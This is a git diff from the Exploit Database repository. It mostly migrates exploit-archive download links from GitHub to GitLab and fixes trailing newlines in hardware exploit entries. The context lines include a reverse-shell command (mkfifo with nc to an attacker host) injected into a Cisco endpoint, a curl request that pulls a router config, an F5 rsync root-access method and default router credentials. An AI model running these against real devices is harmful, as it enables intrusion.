appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22978.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22978.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/23876.txt b/exploits/hardware/dos/23876.txt index 6e791c628..62cbd1f3a 100644 --- a/exploits/hardware/dos/23876.txt +++ b/exploits/hardware/dos/23876.txt @@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23876.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23876.zip \ No newline at end of file diff --git a/exploits/hardware/dos/23900.txt b/exploits/hardware/dos/23900.txt index f22c3d4f9..907ca0bfb 100644 --- a/exploits/hardware/dos/23900.txt +++ b/exploits/hardware/dos/23900.txt @@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib All versions of cdp are assumed to be vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23900.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23900.tgz \ No newline at end of file diff --git a/exploits/hardware/dos/28228.txt b/exploits/hardware/dos/28228.txt index c89f07957..6590ee307 100644 --- a/exploits/hardware/dos/28228.txt +++ b/exploits/hardware/dos/28228.txt @@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28228.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28228.zip \ No newline at end of file diff --git a/exploits/hardware/dos/41806.txt b/exploits/hardware/dos/41806.txt index 19298a97a..ff2aaaa3f 100644 --- a/exploits/hardware/dos/41806.txt +++ b/exploits/hardware/dos/41806.txt @@ -72,4 +72,4 @@ I've been able to verify this vulnerability on the BCM4339 chip, running version Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41806.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41806.zip \ No newline at end of file diff --git a/exploits/hardware/dos/43119.py b/exploits/hardware/dos/43119.py index 04052e1df..f7458a517 100755 --- a/exploits/hardware/dos/43119.py +++ b/exploits/hardware/dos/43119.py @@ -51,4 +51,4 @@ while True: s.close() except: print("[!] Can't connect to target") - sys.exit() + sys.exit() \ No newline at end of file diff --git a/exploits/hardware/dos/43490.txt b/exploits/hardware/dos/43490.txt index 81e61520b..8c2e1497c 100644 --- a/exploits/hardware/dos/43490.txt +++ b/exploits/hardware/dos/43490.txt @@ -143,4 +143,4 @@ flushing would be necessary to make it work. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43490.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip \ No newline at end of file diff --git a/exploits/hardware/dos/44197.md b/exploits/hardware/dos/44197.md index 77f91e108..065358cf2 100644 --- a/exploits/hardware/dos/44197.md +++ b/exploits/hardware/dos/44197.md @@ -25,4 +25,4 @@ License MIT License. See attached `LICENSE.md` file. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44197.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44197.zip \ No newline at end of file diff --git a/exploits/hardware/dos/8013.txt b/exploits/hardware/dos/8013.txt index 03484012b..1da3012cf 100644 --- a/exploits/hardware/dos/8013.txt +++ b/exploits/hardware/dos/8013.txt @@ -27,7 +27,7 @@ POC/EXPLOIT you can open this url with the browser or send mms with this image. http://es.geocities.com/jplopezy/nokiacrash.jpg -alt: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8013.jpg (2009-nokiacrash.jpg) +alt: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8013.jpg (2009-nokiacrash.jpg) ------------------------------------------------------ Juan Pablo Lopez Yacubian diff --git a/exploits/hardware/local/21001.txt b/exploits/hardware/local/21001.txt index 338277631..b305caad1 100644 --- a/exploits/hardware/local/21001.txt +++ b/exploits/hardware/local/21001.txt @@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia Since user-supplied data is written to the target file, attackers may be able to elevate privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21001.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21001.tar.gz \ No newline at end of file diff --git a/exploits/hardware/local/40271.txt b/exploits/hardware/local/40271.txt index bc2647796..ac5e58f62 100644 --- a/exploits/hardware/local/40271.txt +++ b/exploits/hardware/local/40271.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40271.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40271.zip \ No newline at end of file diff --git a/exploits/hardware/local/43397.md b/exploits/hardware/local/43397.md index 5bc386670..3062841b8 100644 --- a/exploits/hardware/local/43397.md +++ b/exploits/hardware/local/43397.md @@ -29,4 +29,4 @@ I was not alone in this exploit's development, and would like to thank those who - Anonymous -E-DB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43397.zip \ No newline at end of file +E-DB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43397.zip \ No newline at end of file diff --git a/exploits/hardware/local/44198.md b/exploits/hardware/local/44198.md index 48547181f..afa60c4d7 100644 --- a/exploits/hardware/local/44198.md +++ b/exploits/hardware/local/44198.md @@ -26,4 +26,4 @@ Credits ============== qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/). -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44198.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44198.zip \ No newline at end of file diff --git a/exploits/hardware/local/44200.md b/exploits/hardware/local/44200.md index e6984098f..31c30563c 100644 --- a/exploits/hardware/local/44200.md +++ b/exploits/hardware/local/44200.md @@ -18,4 +18,4 @@ Liang Chen thexyz dreadlyei -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44200.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44200.zip \ No newline at end of file diff --git a/exploits/hardware/local/44644.txt b/exploits/hardware/local/44644.txt index 7e9040c90..2baf06c5a 100644 --- a/exploits/hardware/local/44644.txt +++ b/exploits/hardware/local/44644.txt @@ -17,4 +17,4 @@ It is desired to find a way to invoke edge engine when console is offline Greets from unknownv2 & mon0 _ -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44644.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44644.zip \ No newline at end of file diff --git a/exploits/hardware/local/44818.md b/exploits/hardware/local/44818.md index d9667b6f9..4c998083e 100644 --- a/exploits/hardware/local/44818.md +++ b/exploits/hardware/local/44818.md @@ -5,7 +5,7 @@ In this project you will find a full implementation of the second "bpf" kernel e This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/505k/). The [GitHub Pages site](https://cryptogenic.github.io/PS4-5.05-Kernel-Exploit/) automatically generated from this repository should also work. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44818.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44818.zip ## Patches Included The following patches are made by default in the kernel ROP chain: diff --git a/exploits/hardware/local/44820.txt b/exploits/hardware/local/44820.txt index 3973cf14c..dde56930c 100644 --- a/exploits/hardware/local/44820.txt +++ b/exploits/hardware/local/44820.txt @@ -1,5 +1,5 @@ EDB Note ~ http://ps3xploit.com/help/dumper.html -EDB Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44820.zip +EDB Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44820.zip ## Dumper Help diff --git a/exploits/hardware/local/45785.md b/exploits/hardware/local/45785.md index 0d6ffc6b2..2131dd1a4 100644 --- a/exploits/hardware/local/45785.md +++ b/exploits/hardware/local/45785.md @@ -119,4 +119,4 @@ You can play around with one victim at a time in `sync.sh`. Sample output for th -EDB Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45785.zip +EDB Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45785.zip \ No newline at end of file diff --git a/exploits/hardware/local/46522.md b/exploits/hardware/local/46522.md index f15b92b8d..5b544cabb 100644 --- a/exploits/hardware/local/46522.md +++ b/exploits/hardware/local/46522.md @@ -70,4 +70,4 @@ qwertyoruiop - WebKit School saelo - Phrack paper -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46522.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46522.zip \ No newline at end of file diff --git a/exploits/hardware/remote/12298.txt b/exploits/hardware/remote/12298.txt index e85ca0809..f27d65885 100644 --- a/exploits/hardware/remote/12298.txt +++ b/exploits/hardware/remote/12298.txt @@ -9,7 +9,7 @@ # V100R001B121Telmex # Exploit Download Link: # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12298.tar.gz (HG520_udpinfo.tar.gz) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12298.tar.gz (HG520_udpinfo.tar.gz) By sending a specially crafted UDP packet you can remotely obtain the diff --git a/exploits/hardware/remote/18291.txt b/exploits/hardware/remote/18291.txt index dbcf71fc0..e11aa693b 100644 --- a/exploits/hardware/remote/18291.txt +++ b/exploits/hardware/remote/18291.txt @@ -7,4 +7,4 @@ # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others # CVE : No CVE US-CERT VU#723755 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file diff --git a/exploits/hardware/remote/19538.txt b/exploits/hardware/remote/19538.txt index e41053062..8c40192a3 100644 --- a/exploits/hardware/remote/19538.txt +++ b/exploits/hardware/remote/19538.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/695/info Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-1.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-2.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19538-3.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19538-1.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19538-2.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19538-3.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/2034.txt b/exploits/hardware/remote/2034.txt index 224d03196..16e8e457f 100644 --- a/exploits/hardware/remote/2034.txt +++ b/exploits/hardware/remote/2034.txt @@ -1,5 +1,5 @@ BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2034.tgz (07182006-btvoyager.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2034.tgz (07182006-btvoyager.tgz) # milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/hardware/remote/22532.txt b/exploits/hardware/remote/22532.txt index 387bdb79a..0ae59ba66 100644 --- a/exploits/hardware/remote/22532.txt +++ b/exploits/hardware/remote/22532.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7423/info When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22532.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22532.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/23212.txt b/exploits/hardware/remote/23212.txt index 06f355801..e04dda7e6 100644 --- a/exploits/hardware/remote/23212.txt +++ b/exploits/hardware/remote/23212.txt @@ -5,4 +5,4 @@ Authentication Protocol) is prone to a password disclosure weakness that may all Successful exploitation of this weakness may allow a remote attacker to steal authentication information, potentially allowing for unauthorized network access. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23212.tar.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23212.tar.bz2 \ No newline at end of file diff --git a/exploits/hardware/remote/28056.txt b/exploits/hardware/remote/28056.txt index a264ab6c9..0dc50a5e7 100644 --- a/exploits/hardware/remote/28056.txt +++ b/exploits/hardware/remote/28056.txt @@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term. The 50 megs Mikrotik package including the all research items can be downloaded here: http://www.farlight.org/mikropackage.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28056.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28056.zip \ No newline at end of file diff --git a/exploits/hardware/remote/31132.txt b/exploits/hardware/remote/31132.txt index 3778b1ea8..b4f8e4fcb 100644 --- a/exploits/hardware/remote/31132.txt +++ b/exploits/hardware/remote/31132.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to cause denial-of-service conditions or to o These issues affect versions prior to ExtremeZ-IP File Server 5.1.2x15 and ExtremeZ-IP Print Server 5.1.2x15. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31132.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31132.zip \ No newline at end of file diff --git a/exploits/hardware/remote/33869.txt b/exploits/hardware/remote/33869.txt index a8fef5f68..b3a06234a 100644 --- a/exploits/hardware/remote/33869.txt +++ b/exploits/hardware/remote/33869.txt @@ -8,4 +8,4 @@ The following Huawei EchoLife HG520 firmware and software versions are vulnerabl Firmware 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0, 3.10.18.4 Software Versions: V100R001B120Telmex, V100R001B121Telmex -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33869.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33869.tar.gz \ No newline at end of file diff --git a/exploits/hardware/remote/34465.txt b/exploits/hardware/remote/34465.txt index b7d28b759..1a6d04ca9 100644 --- a/exploits/hardware/remote/34465.txt +++ b/exploits/hardware/remote/34465.txt @@ -1,4 +1,4 @@ When configured in a high availability mode, the F5 solution suffers from an unauthenticated rsync access vulnerability that can be leveraged to upload a malicious SSH key and gain remote root access to the appliance. The BigIP platform configures an rsync daemon listening on the ConfigSync interfaces when the system is configured in a failover mode. The rsync daemon as currently configured does not require any authentication and the “cmi” module has complete read/write access to the system. If the ConfigSync IP addresses are accessible by a malicious third party, it is possible to upload an authorized_keys file directly into the /var/ssh/root directory and then open a root SSH session on the f5 device. -Advisory: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34465.pdf \ No newline at end of file +Advisory: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34465.pdf \ No newline at end of file diff --git a/exploits/hardware/remote/39314.c b/exploits/hardware/remote/39314.c index 009402139..061407f78 100644 --- a/exploits/hardware/remote/39314.c +++ b/exploits/hardware/remote/39314.c @@ -34,4 +34,4 @@ curl -i -H "$PARM1" \ -H "$PARM4" \ -H "$PARM5" \ -H "$PARM6" \ - -H "$PARM7" http://www.example.com:$PORT/%63%67%69%2d%62%69%6e%2f%75%73%65%72%72%6f%6d%66%69%6c%65%2e%63%67%69 > romfile.cfg + -H "$PARM7" http://www.example.com:$PORT/%63%67%69%2d%62%69%6e%2f%75%73%65%72%72%6f%6d%66%69%6c%65%2e%63%67%69 > romfile.cfg \ No newline at end of file diff --git a/exploits/hardware/remote/39823.py b/exploits/hardware/remote/39823.py index fbbc159c0..02fd03c14 100755 --- a/exploits/hardware/remote/39823.py +++ b/exploits/hardware/remote/39823.py @@ -473,5 +473,4 @@ if __name__ == "__main__": sess1.send(packet) # Hopefully we'll get something interesting - exploit.interact() - + exploit.interact() \ No newline at end of file diff --git a/exploits/hardware/remote/40258.txt b/exploits/hardware/remote/40258.txt index 821a16e38..249c0c8fb 100644 --- a/exploits/hardware/remote/40258.txt +++ b/exploits/hardware/remote/40258.txt @@ -14,4 +14,4 @@ Requirements: Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40258.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40258.zip \ No newline at end of file diff --git a/exploits/hardware/remote/40275.txt b/exploits/hardware/remote/40275.txt index 32a9ebbd6..4e4b141bc 100644 --- a/exploits/hardware/remote/40275.txt +++ b/exploits/hardware/remote/40275.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40275.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40275.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41298.txt b/exploits/hardware/remote/41298.txt index 235bd0400..e6e726f4a 100644 --- a/exploits/hardware/remote/41298.txt +++ b/exploits/hardware/remote/41298.txt @@ -115,4 +115,4 @@ OPTIONS: -h, --help Print this message ` -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41298.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41298.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41805.txt b/exploits/hardware/remote/41805.txt index 5881794f9..00a49949f 100644 --- a/exploits/hardware/remote/41805.txt +++ b/exploits/hardware/remote/41805.txt @@ -130,4 +130,4 @@ BCMPatcher.tar.gz Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41805.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41805.zip \ No newline at end of file diff --git a/exploits/hardware/remote/41808.txt b/exploits/hardware/remote/41808.txt index e5b304ad2..0569f5df9 100644 --- a/exploits/hardware/remote/41808.txt +++ b/exploits/hardware/remote/41808.txt @@ -57,4 +57,4 @@ This exploit uses scapy-fakeap to broadcast a dummy network. The exploit starts Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41808.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41808.zip \ No newline at end of file diff --git a/exploits/hardware/remote/42726.py b/exploits/hardware/remote/42726.py index 4e754bed7..a20e5562f 100755 --- a/exploits/hardware/remote/42726.py +++ b/exploits/hardware/remote/42726.py @@ -124,4 +124,4 @@ while True: else: conn.send(cmd + "\n") receive(conn) -sock.close() +sock.close() \ No newline at end of file diff --git a/exploits/hardware/remote/42787.txt b/exploits/hardware/remote/42787.txt index a4b3eb570..c85e42045 100644 --- a/exploits/hardware/remote/42787.txt +++ b/exploits/hardware/remote/42787.txt @@ -51,4 +51,4 @@ root:indigo root:video default:video default:[blank] -ftp:video +ftp:video \ No newline at end of file diff --git a/exploits/hardware/remote/42888.sh b/exploits/hardware/remote/42888.sh index 9da72a437..71b7d28d4 100755 --- a/exploits/hardware/remote/42888.sh +++ b/exploits/hardware/remote/42888.sh @@ -25,4 +25,4 @@ BASH=$(encode "/bin/bash") COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f") SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});" -curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT" +curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT" \ No newline at end of file diff --git a/exploits/hardware/remote/43061.txt b/exploits/hardware/remote/43061.txt index 5a7985d4d..011179f29 100644 --- a/exploits/hardware/remote/43061.txt +++ b/exploits/hardware/remote/43061.txt @@ -24,4 +24,4 @@ In some of the MitraStar routers there is a zyad1234 user with password zyad1234 Solution -------- In the latest firmware versions this have been fixed. -If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before. +If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before. \ No newline at end of file diff --git a/exploits/hardware/remote/43105.txt b/exploits/hardware/remote/43105.txt index bc57ebd2e..51b209847 100644 --- a/exploits/hardware/remote/43105.txt +++ b/exploits/hardware/remote/43105.txt @@ -36,6 +36,4 @@ root # uname -a Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown # cat /etc/zyfwinfo -Vendor Name: ZyXEL Communications Corp. - - +Vendor Name: ZyXEL Communications Corp. \ No newline at end of file diff --git a/exploits/hardware/remote/43118.txt b/exploits/hardware/remote/43118.txt index 1489100a2..dd0654aad 100644 --- a/exploits/hardware/remote/43118.txt +++ b/exploits/hardware/remote/43118.txt @@ -29,4 +29,4 @@ Password: CenturyL1nk # cat /proc/version Linux version 2.6.30 (waye@hugh-PowerEdge-R220.home) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #1 SMP PREEMPT Fri Oct 30 12:32:15 CST 2015 # cat /etc/group - root::0:root,admin,support,user + root::0:root,admin,support,user \ No newline at end of file diff --git a/exploits/hardware/remote/44196.md b/exploits/hardware/remote/44196.md index 6a7724a4a..7032f1fc9 100644 --- a/exploits/hardware/remote/44196.md +++ b/exploits/hardware/remote/44196.md @@ -27,4 +27,4 @@ Massive credits to the following: - [Flatz](https://twitter.com/flat_z) - Anonymous -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44196-v2.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44196-v2.zip \ No newline at end of file diff --git a/exploits/hardware/remote/44574.txt b/exploits/hardware/remote/44574.txt index 2b985af61..079f08d51 100644 --- a/exploits/hardware/remote/44574.txt +++ b/exploits/hardware/remote/44574.txt @@ -32,4 +32,4 @@ functions properly. $ ssh root@norton.core ``` -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44574.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44574.zip \ No newline at end of file diff --git a/exploits/hardware/remote/44635.py b/exploits/hardware/remote/44635.py index 430808119..b906b6b4a 100755 --- a/exploits/hardware/remote/44635.py +++ b/exploits/hardware/remote/44635.py @@ -114,4 +114,4 @@ if __name__ == "__main__": print("Exploit and clean up failed!") sys.exit(1) - print("Exploitation complete") + print("Exploitation complete") \ No newline at end of file diff --git a/exploits/hardware/remote/46444.txt b/exploits/hardware/remote/46444.txt index 838f65da1..4259d6dc3 100644 --- a/exploits/hardware/remote/46444.txt +++ b/exploits/hardware/remote/46444.txt @@ -41,4 +41,4 @@ albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46444.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46444.zip \ No newline at end of file diff --git a/exploits/hardware/remote/47936.js b/exploits/hardware/remote/47936.js index dfa392fcc..50a749395 100644 --- a/exploits/hardware/remote/47936.js +++ b/exploits/hardware/remote/47936.js @@ -1,4 +1,4 @@ -// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip +// EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47936.zip function buf2hex(buffer) { // buffer is an ArrayBuffer return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join(''); diff --git a/exploits/hardware/remote/50351.txt b/exploits/hardware/remote/50351.txt index ae2830de8..b90660ae6 100644 --- a/exploits/hardware/remote/50351.txt +++ b/exploits/hardware/remote/50351.txt @@ -1,10 +1,10 @@ -# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation +# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation # Date: 10-08-2021 # Exploit Author: Leonardo Nicolas Servalli # Vendor Homepage: www.mitrastar.com -# Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU) -# Tested on: Firmware BR_g3.5_100VNZ0b33 -# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md +# Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU) +# Tested on: Firmware BR_g3.5_100VNZ0b33 +# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md Description: diff --git a/exploits/hardware/remote/8269.txt b/exploits/hardware/remote/8269.txt index 65a043fde..bc21ede35 100644 --- a/exploits/hardware/remote/8269.txt +++ b/exploits/hardware/remote/8269.txt @@ -197,7 +197,7 @@ name="backdoor"> Proof-of-concept brute force tool available at http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) Other information: diff --git a/exploits/hardware/webapps/11101.txt b/exploits/hardware/webapps/11101.txt index f91b75a9a..11afce4be 100644 --- a/exploits/hardware/webapps/11101.txt +++ b/exploits/hardware/webapps/11101.txt @@ -16,4 +16,4 @@ firmware versions have been confirmed to date: Detailed description available here: http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf -POC code available here: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file +POC code available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file diff --git a/exploits/hardware/webapps/12092.txt b/exploits/hardware/webapps/12092.txt index 0f520be84..a3cbc7c7a 100644 --- a/exploits/hardware/webapps/12092.txt +++ b/exploits/hardware/webapps/12092.txt @@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti logged-in user. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file diff --git a/exploits/hardware/webapps/29959.txt b/exploits/hardware/webapps/29959.txt index 6deb3ff6f..133cff8ba 100644 --- a/exploits/hardware/webapps/29959.txt +++ b/exploits/hardware/webapps/29959.txt @@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com Root-Node -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29959.nse \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29959.nse \ No newline at end of file diff --git a/exploits/hardware/webapps/31088.py b/exploits/hardware/webapps/31088.py index a05290898..06a7ef298 100755 --- a/exploits/hardware/webapps/31088.py +++ b/exploits/hardware/webapps/31088.py @@ -52,7 +52,4 @@ def main(): print "[-] Use:bluecomRT.py " if __name__ == '__main__': - main() - - - + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/32237.txt b/exploits/hardware/webapps/32237.txt index 2a3813b29..bea22b099 100644 --- a/exploits/hardware/webapps/32237.txt +++ b/exploits/hardware/webapps/32237.txt @@ 